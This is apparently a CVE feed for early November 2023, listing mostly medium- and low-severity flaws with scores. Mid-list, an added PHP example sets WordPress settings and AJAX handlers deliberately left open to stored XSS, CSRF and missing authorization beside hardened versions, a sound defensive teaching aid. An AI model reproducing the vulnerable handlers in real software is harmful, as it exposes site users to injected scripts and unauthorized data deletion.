The Telephone Number Linker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'telnumlink' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5076 Ziteboard Cross-site Scripting vulnerability in Ziteboard

The Ziteboard Online Whiteboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ziteboard' shortcode in versions up to, and including, 2.9.9 due to insufficient input sanitization and output escaping.

5.4
2023-11-07 CVE-2023-38549 Veeam Cross-site Scripting vulnerability in Veeam ONE

A vulnerability in Veeam ONE allows an unprivileged user who has access to the Veeam ONE Web Client the ability to acquire the NTLM hash of the account used by the Veeam ONE Reporting Service.

5.4
2023-11-07 CVE-2023-5903 SFU Unspecified vulnerability in SFU PKP web Application Library

Cross-site Scripting (XSS) - Stored in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

5.4
2023-11-07 CVE-2023-5904 SFU Unspecified vulnerability in SFU PKP web Application Library

Cross-site Scripting (XSS) - Stored in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

5.4
2023-11-06 CVE-2023-36769 Microsoft Unspecified vulnerability in Microsoft Onenote

Microsoft OneNote Spoofing Vulnerability

5.4
2023-11-06 CVE-2023-45556 Mybb Cross-site Scripting vulnerability in Mybb

Cross Site Scripting vulnerability in Mybb Mybb Forums v.1.8.33 allows a local attacker to execute arbitrary code via the theme Name parameter in the theme management component.

5.4
2023-11-06 CVE-2023-46782 Chrisyee Cross-site Scripting vulnerability in Chrisyee Momentopress for Momento360 1.0.0/1.0.1

Auth.

5.4
2023-11-06 CVE-2023-46783 Brightplugins Cross-site Scripting vulnerability in Brightplugins Pre-Orders for Woocommerce

Auth.

5.4
2023-11-06 CVE-2023-47177 Pojo Cross-site Scripting vulnerability in Pojo Linker

Auth.

5.4
2023-11-10 CVE-2023-47122 Sigstore Improper Verification of Cryptographic Signature vulnerability in Sigstore Gitsign 0.6.0/0.7.0/0.7.1

Gitsign is software for keyless Git signing using Sigstore.

5.3
2023-11-09 CVE-2023-5545 Moodle
Fedoraproject
Exposure of Resource to Wrong Sphere vulnerability in multiple products

H5P metadata automatically populated the author with the user's username, which could be sensitive information.

5.3
2023-11-09 CVE-2023-5548 Moodle
Fedoraproject
Insufficient Verification of Data Authenticity vulnerability in multiple products

Stronger revision number limitations were required on file serving endpoints to improve cache poisoning protection.

5.3
2023-11-09 CVE-2023-5549 Moodle
Fedoraproject
Improper Privilege Management vulnerability in multiple products

Insufficient web service capability checks made it possible to move categories a user had permission to manage, to a parent category they did not have the capability to manage.

5.3
2023-11-09 CVE-2023-45284 Golang Unspecified vulnerability in Golang GO

On Windows, The IsLocal function does not correctly detect reserved device names in some cases.

5.3
2023-11-09 CVE-2023-47110 Prestashop Unspecified vulnerability in Prestashop Customer Reassurance Block

blockreassurance adds an information block aimed at offering helpful information to reassure customers that their store is trustworthy.

5.3
2023-11-08 CVE-2023-46756 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Permission control vulnerability in the window management module.

5.3
2023-11-08 CVE-2023-46755 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Vulnerability of input parameters not being strictly verified in the input module.

5.3
2023-11-08 CVE-2023-46763 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Vulnerability of background app permission management in the framework module.

5.3
2023-11-08 CVE-2023-46764 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Unauthorized startup vulnerability of background apps.

5.3
2023-11-07 CVE-2023-46737 Sigstore Infinite Loop vulnerability in Sigstore Cosign

Cosign is a sigstore signing tool for OCI containers.

5.3
2023-11-07 CVE-2023-46819 Apache Missing Authentication for Critical Function vulnerability in Apache Ofbiz

Missing Authentication in Apache Software Foundation Apache OFBiz when using the Solr plugin. This issue affects Apache OFBiz: before 18.12.09. Users are recommended to upgrade to version 18.12.09.

5.3
2023-11-07 CVE-2023-42541 Samsung Incorrect Authorization vulnerability in Samsung Push Service

Improper authorization in PushClientProvider of Samsung Push Service prior to version 3.4.10 allows an attacker to access a unique id.

5.3
2023-11-07 CVE-2023-42553 Samsung Unspecified vulnerability in Samsung Email 6.1.82.0

Improper authorization verification vulnerability in Samsung Email prior to version 6.1.90.4 allows attackers to read sandbox data of email.

5.3
2023-11-07 CVE-2023-47102 Urbackup Information Exposure Through Discrepancy vulnerability in Urbackup Server 2.5.31

UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid.

5.3
2023-11-06 CVE-2023-5678 Openssl Improper Check for Unusual or Exceptional Conditions vulnerability in Openssl

Issue summary: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow. Impact summary: Applications that use the functions DH_generate_key() to generate an X9.42 DH key may experience long delays.

5.3
2023-11-06 CVE-2023-5969 Mattermost Resource Exhaustion vulnerability in Mattermost

Mattermost fails to properly sanitize the request to /api/v4/redirect_location allowing an attacker, sending a specially crafted request to /api/v4/redirect_location, to fill up the memory due to caching large items.

5.3
2023-11-06 CVE-2023-5831 Gitlab Unspecified vulnerability in Gitlab

An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.0 before 16.3.6, all versions starting from 16.4 before 16.4.2, and all versions starting from 16.5.0 before 16.5.1 which have the `super_sidebar_logged_out` feature flag enabled.

5.3
2023-11-06 CVE-2023-4625 Mitsubishielectric Improper Restriction of Excessive Authentication Attempts vulnerability in Mitsubishielectric products

Improper Restriction of Excessive Authentication Attempts vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F/iQ-R Series CPU modules Web server function allows a remote unauthenticated attacker to prevent legitimate users from logging into the Web server function for a certain period after the attacker has attempted to log in illegally by continuously attempting unauthorized login to the Web server function.

5.3
2023-11-06 CVE-2023-47271 SFU Unspecified vulnerability in SFU PKP web Application Library

PKP-WAL (aka PKP Web Application Library or pkp-lib) before 3.3.0-16, as used in Open Journal Systems (OJS) and other products, does not verify that the file named in an XML document (used for the native import/export plugin) is an image file, before trying to use it for an issue cover image.

5.3
2023-11-09 CVE-2023-4218 Eclipse XXE vulnerability in Eclipse IDE

In Eclipse IDE versions < 2023-09 (4.29) some files with xml content are parsed vulnerable against all sorts of XXE attacks.

5.0
2023-11-07 CVE-2023-46851 Apache External Control of File Name or Path vulnerability in Apache Allura

Allura Discussion and Allura Forum importing does not restrict URL values specified in attachments.

4.9
2023-11-06 CVE-2023-5968 Mattermost Improper Encoding or Escaping of Output vulnerability in Mattermost

Mattermost fails to properly sanitize the user object when updating the username, resulting in the password hash being included in the response body. 

4.9
2023-11-09 CVE-2023-36688 Idoweb Cross-site Scripting vulnerability in Idoweb Simple Site Verify

Auth.

4.8
2023-11-08 CVE-2023-47181 Northernbeacheswebsites Cross-site Scripting vulnerability in Northernbeacheswebsites Ideapush

Auth.

4.8
2023-11-08 CVE-2023-47223 Wpmapplugins Cross-site Scripting vulnerability in Wpmapplugins Basic Interactive World MAP

Auth.

4.8
2023-11-08 CVE-2023-47226 I13Websolution Cross-site Scripting vulnerability in I13Websolution Post Sliders & Post Grids

Auth.

4.8
2023-11-08 CVE-2023-47227 WEB Settler Cross-site Scripting vulnerability in Web-Settler Social Feed | ALL Social Media in ONE Place

Auth.

4.8
2023-11-08 CVE-2023-47228 WEB Settler Cross-site Scripting vulnerability in Web-Settler Layer Slider

Auth.

4.8
2023-11-08 CVE-2023-46642 Sahu Cross-site Scripting vulnerability in Sahu Tiktok Pixel for E-Commerce

Auth.

4.8
2023-11-07 CVE-2023-5819 Gara Cross-site Scripting vulnerability in Gara Amazonify

The Amazonify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 0.8.1 due to insufficient input sanitization and output escaping.

4.8
2023-11-07 CVE-2023-5901 SFU Cross-site Scripting vulnerability in SFU PKP web Application Library

Cross-site Scripting in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

4.8
2023-11-06 CVE-2023-4810 Wpdarko Cross-site Scripting vulnerability in Wpdarko Responsive Pricing Table

The Responsive Pricing Table WordPress plugin before 5.1.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

4.8
2023-11-06 CVE-2023-4858 Topcode Cross-site Scripting vulnerability in Topcode Simple Table Manager

The Simple Table Manager WordPress plugin through 1.5.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

4.8
2023-11-06 CVE-2023-5181 Sarveshmrao Cross-site Scripting vulnerability in Sarveshmrao WP Discord Invite

The WP Discord Invite WordPress plugin before 2.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

4.8
2023-11-06 CVE-2023-5228 Wpeverest Cross-site Scripting vulnerability in Wpeverest User Registration

The User Registration WordPress plugin before 3.0.4.2 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

4.8
2023-11-06 CVE-2023-5530 Ninjaforms Cross-site Scripting vulnerability in Ninjaforms Ninja Forms

The Ninja Forms Contact Form WordPress plugin before 3.6.34 does not sanitize and escape its label fields, which could allow high privilege users such as admin to perform Stored XSS attacks.

4.8
2023-11-06 CVE-2023-5605 Kaizencoders Cross-site Scripting vulnerability in Kaizencoders URL Shortify

The URL Shortify WordPress plugin before 1.7.9.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

4.8
2023-11-06 CVE-2023-23702 Pixelgrade Cross-site Scripting vulnerability in Pixelgrade Comments Rating

Auth.

4.8
2023-11-06 CVE-2023-46824 Omaksolutions Cross-site Scripting vulnerability in Omaksolutions Slick Popup

Auth.

4.8
2023-11-06 CVE-2023-47184 Properfraction Cross-site Scripting vulnerability in Properfraction Admin BAR & Dashboard Access Control

Auth.

4.8
2023-11-09 CVE-2023-47616 Telit Unspecified vulnerability in Telit products

A CWE-200: Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81 and Telit Cinterion PLS62 that could allow an attacker with physical access to the target system to gain access to sensitive data on it.

4.6
2023-11-08 CVE-2023-45140 OVH Missing Authentication for Critical Function vulnerability in OVH The-Bastion

The Bastion provides authentication, authorization, traceability and auditability for SSH accesses.

4.6
2023-11-08 CVE-2023-43572 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A buffer over-read was reported in the BiosExtensionLoader module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to disclose sensitive information.

4.4
2023-11-08 CVE-2023-43574 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A buffer over-read was reported in the LEMALLDriversConnectedEventHook module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to disclose sensitive information.

4.4
2023-11-08 CVE-2023-43568 Lenovo Buffer Over-read vulnerability in Lenovo products

A buffer over-read was reported in the LemSecureBootForceKey module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to disclose sensitive information.

4.4
2023-11-12 CVE-2023-47037 Apache Incorrect Authorization vulnerability in Apache Airflow

We failed to apply CVE-2023-40611 in 2.7.1 and this vulnerability was marked as fixed then.  Apache Airflow, versions before 2.7.3, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes.

4.3
2023-11-11 CVE-2023-5959 Byzoro Weak Password Recovery Mechanism for Forgotten Password vulnerability in Byzoro Smart S85F Firmware V31R02B1001

A vulnerability, which was classified as problematic, was found in Byzoro Smart S85F Management Platform V31R02B10-01.

4.3
2023-11-09 CVE-2023-5542 Moodle
Fedoraproject
Exposure of Resource to Wrong Sphere vulnerability in multiple products

Students in "Only see own membership" groups could see other students in the group, which should be hidden.

4.3
2023-11-09 CVE-2023-46743 Xwiki Incorrect Default Permissions vulnerability in Xwiki Application-Collabora

application-collabora is an integration of Collabora Online in XWiki.

4.3
2023-11-08 CVE-2023-41270 Samsung Improper Restriction of Excessive Authentication Attempts vulnerability in Samsung Ue40D7000 Firmware Tgapdeuc1033.2

Improper Restriction of Excessive Authentication Attempts vulnerability in Samsung Smart TV UE40D7000 version T-GAPDEUC-1033.2 and before allows attackers to cause a denial of service via WPS attack tools.

4.3
2023-11-07 CVE-2023-4956 Redhat Improper Restriction of Rendered UI Layers or Frames vulnerability in Redhat Quay 3.0.0

A flaw was found in Quay.

4.3
2023-11-07 CVE-2023-5818 Gara Cross-Site Request Forgery (CSRF) vulnerability in Gara Amazonify

The Amazonify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.8.1.

4.3
2023-11-07 CVE-2023-5506 Imagemapper Project Missing Authorization vulnerability in Imagemapper Project Imagemapper 1.2.6

The ImageMapper plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'imgmap_delete_area_ajax' function in versions up to, and including, 1.2.6.

4.3
2023-11-07 CVE-2023-5532 Imagemapper Project Cross-Site Request Forgery (CSRF) vulnerability in Imagemapper Project Imagemapper 1.2.6

The ImageMapper plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.6.

4.3
2023-11-07 CVE-2023-5975 Imagemapper Project Cross-Site Request Forgery (CSRF) vulnerability in Imagemapper Project Imagemapper 1.2.6

The ImageMapper plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.6.

4.3
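The WordPress plugin entries in this report fall into three recurring patterns: settings that are stored without sanitisation and echoed without escaping (stored XSS reachable by an admin even where unfiltered_html is disallowed), form and AJAX handlers that accept requests without a nonce (CSRF), and AJAX handlers that never check a capability (the ImageMapper missing-authorization entry). The following is an added example and is not code from Amazonify, ImageMapper or any other plugin listed here. It shows each weak pattern beside its hardened form. It assumes it runs inside WordPress (register_setting(), esc_attr(), check_ajax_referer() and the other calls are WordPress core functions); the option, action, table and function names prefixed myplugin_ are hypothetical.

```php
<?php
// Added example, not plugin code. Vulnerable pattern vs hardened pattern for the
// three WordPress weakness classes seen in this report.

// --- Vulnerable setting: saved verbatim, echoed raw. An admin whose unfiltered_html
//     capability is removed (the multisite default) can still store <script> here,
//     and the settings page runs it for every admin who opens it.
function myplugin_register_settings_vulnerable() {
    register_setting( 'myplugin', 'myplugin_title' );            // no sanitize_callback
}
function myplugin_render_title_vulnerable() {
    echo '<input name="myplugin_title" value="' . get_option( 'myplugin_title' ) . '">';
}

// --- Hardened setting: sanitise on the way in, escape on the way out.
function myplugin_register_settings() {
    register_setting( 'myplugin', 'myplugin_title', array(
        'type'              => 'string',
        'sanitize_callback' => 'sanitize_text_field', // strips tags, newlines, stray bytes
        'default'           => '',
    ) );
}
function myplugin_render_title() {
    echo '<input name="myplugin_title" value="'
        . esc_attr( get_option( 'myplugin_title', '' ) ) . '">';
}
add_action( 'admin_init', 'myplugin_register_settings' );

// --- Vulnerable AJAX delete: any logged-in user, or any third-party page that can
//     make a logged-in user's browser send this request, deletes arbitrary rows.
function myplugin_delete_area_vulnerable() {
    global $wpdb;
    $wpdb->delete( $wpdb->prefix . 'myplugin_areas', array( 'id' => (int) $_POST['id'] ) );
    wp_send_json_success();
}

// --- Hardened AJAX delete: nonce (CSRF) first, capability (authorization) second,
//     strict coercion of the input third. Each check fails closed.
function myplugin_delete_area() {
    check_ajax_referer( 'myplugin_delete_area', 'nonce' );      // dies on a bad or missing nonce
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( 0 === $id ) {
        wp_send_json_error( 'bad id', 400 );
    }
    global $wpdb;
    $wpdb->delete( $wpdb->prefix . 'myplugin_areas', array( 'id' => $id ), array( '%d' ) );
    wp_send_json_success();
}
add_action( 'wp_ajax_myplugin_delete_area', 'myplugin_delete_area' );

// The matching nonce is emitted where the delete control is rendered, e.g.
//   wp_nonce_field( 'myplugin_delete_area', 'nonce' );
// and must be sent back as the "nonce" POST field by the JavaScript that calls the action.
```

A nonce alone does not fix the ImageMapper class of bug, and a capability check alone does not fix the CSRF class: the nonce proves the request originated from a page the plugin rendered, and the capability check proves the user is allowed to do what the request asks. Both are needed, and the capability chosen should match the action (manage_options is used here because the example deletes plugin-wide data).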
2023-11-07 CVE-2023-38548 Veeam Unspecified vulnerability in Veeam ONE 12.0.0.2498/12.0.1.2591

A vulnerability in Veeam ONE allows an unprivileged user who has access to the Veeam ONE Web Client the ability to acquire the NTLM hash of the account used by the Veeam ONE Reporting Service.

4.3
2023-11-07 CVE-2023-41723 Veeam Unspecified vulnerability in Veeam ONE

A vulnerability in Veeam ONE allows a user with the Veeam ONE Read-Only User role to view the Dashboard Schedule.

4.3
2023-11-07 CVE-2023-5900 SFU Cross-Site Request Forgery (CSRF) vulnerability in SFU PKP web Application Library

Cross-Site Request Forgery in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

4.3
2023-11-07 CVE-2023-5902 SFU Cross-Site Request Forgery (CSRF) vulnerability in SFU PKP web Application Library

Cross-Site Request Forgery (CSRF) in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

4.3
2023-11-07 CVE-2023-5976 Microweber Improper Access Control vulnerability in Microweber

Improper Access Control in GitHub repository microweber/microweber prior to 2.0.

4.3
2023-11-07 CVE-2023-38509 Xwiki Resource Leak vulnerability in Xwiki

XWiki Platform is a generic wiki platform.

4.3
2023-11-06 CVE-2023-5352 Getawesomesupport Incorrect Authorization vulnerability in Getawesomesupport Awesome Support

The Awesome Support WordPress plugin before 6.1.5 does not correctly authorize the wpas_edit_reply function, allowing users to edit posts for which they do not have permission.

4.3
2023-11-06 CVE-2023-46254 Clastix Unspecified vulnerability in Clastix Capsule and Capsule-Proxy

capsule-proxy is a reverse proxy for Capsule kubernetes multi-tenancy framework.

4.3
2023-11-06 CVE-2023-5967 Mattermost Improper Check for Unusual or Exceptional Conditions vulnerability in Mattermost

Mattermost fails to properly validate requests to the Calls plugin, allowing an attacker who sends a request without a User-Agent header to cause a panic and crash the Calls plugin.

4.3
2023-11-06 CVE-2023-3246 Gitlab Resource Exhaustion vulnerability in Gitlab

An issue has been discovered in GitLab EE/CE affecting all versions before 16.3.6, all versions starting from 16.4 before 16.4.2, and all versions starting from 16.5 before 16.5.1 which allows an attacker to block the Sidekiq job processor.

4.3
2023-11-06 CVE-2023-5963 Gitlab Unspecified vulnerability in Gitlab

An issue has been discovered in GitLab EE with Advanced Search affecting all versions from 13.9 to 16.3.6, 16.4 prior to 16.4.2 and 16.5 prior to 16.5.1 that could allow a denial of service in the Advanced Search function by chaining too many syntax operators.

4.3

9 Low Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-08 CVE-2023-26221 Tibco Insufficiently Protected Credentials vulnerability in Tibco products

The Spotfire Connectors component of TIBCO Software Inc.'s Spotfire Analyst, Spotfire Server, and Spotfire for AWS Marketplace contains an easily exploitable vulnerability that allows a low privileged attacker with read/write access to craft malicious Analyst files.

3.9
2023-11-06 CVE-2023-4535 Opensc Project
Redhat
Fedoraproject
Out-of-bounds Read vulnerability in multiple products

An out-of-bounds read vulnerability was found in OpenSC packages within the MyEID driver when handling symmetric key encryption.

3.8
2023-11-08 CVE-2023-47111 Zitadel Race Condition vulnerability in Zitadel

ZITADEL provides identity infrastructure.

3.7
2023-11-10 CVE-2023-47614 Telit Unspecified vulnerability in Telit products

A CWE-200: Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to disclose hidden virtual paths and file names on the targeted system.

3.3
2023-11-10 CVE-2023-45816 Discourse Information Exposure vulnerability in Discourse

Discourse is an open source platform for community discussion.

3.3
2023-11-09 CVE-2023-5543 Moodle
Fedoraproject

When duplicating a BigBlueButton activity, the original meeting ID was also duplicated instead of using a new ID for the new activity.

3.3
2023-11-09 CVE-2023-5551 Moodle
Fedoraproject

Separate Groups mode restrictions were not honoured in the forum summary report, which would display users from other groups.

3.3
2023-11-07 CVE-2023-42542 Samsung Unspecified vulnerability in Samsung Push Service

Improper access control vulnerability in Samsung Push Service prior to 3.4.10 allows local attackers to obtain the register ID, which identifies the device.

3.3
2023-11-07 CVE-2023-42552 Samsung Unspecified vulnerability in Samsung Firewall

Implicit intent hijacking vulnerability in the Firewall application prior to versions 12.1.00.24 in Android 11, 13.1.00.16 in Android 12 and 14.1.00.7 in Android 13 allows a third-party application to tamper with the Firewall database.

3.3